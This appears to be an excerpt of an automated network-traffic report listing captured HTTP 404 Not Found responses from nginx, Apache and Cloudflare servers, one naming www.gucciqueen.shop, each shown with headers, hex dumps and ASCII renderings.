Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 02:46:55 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:47:55 GMTServer: ApacheLast-Modified: Wed, 30 Oct 2024 18:34:18 GMTETag: "49d-625b5f32466a6"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:47:57 GMTServer: ApacheLast-Modified: Wed, 30 Oct 2024 18:34:18 GMTETag: "49d-625b5f32466a6"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:00 GMTServer: ApacheLast-Modified: Wed, 30 Oct 2024 18:34:18 GMTETag: "49d-625b5f32466a6"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:03 GMTServer: ApacheLast-Modified: Wed, 30 Oct 2024 18:34:18 GMTETag: "49d-625b5f32466a6"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:22 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:27 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:29 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQP044c%2FYz2go57gcWAkmUIcMsticY8ar5xze29XJ4Q9Yq11UqIQ8QXfkUYdeI0Nz9S2iBvxBQaMtgr4134pKtiO7sDzKn0UJKyZbd7oNb6WEhhrIBofk46u6JhqIcWINjRKuVDeeCg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8db8914a1fe9477c-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1087&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 65 62 0d 0a 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: febTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HAzgZ%2FNkfoeXbUcL5Hj3M51E%2BbY%2BFZ7a5ahNuU3KAN%2BxMs0Y3cezIw51amdmQIhjMO8xRcjXO4QNV%2BB0uB%2FhQxqpOiLsh9bgcbxLhZPHWQasH74UeO%2B4O7gc%2FMGz9k7rUmjc%2FpAxnc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8db89159f9bf2e17-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2150&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=749&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
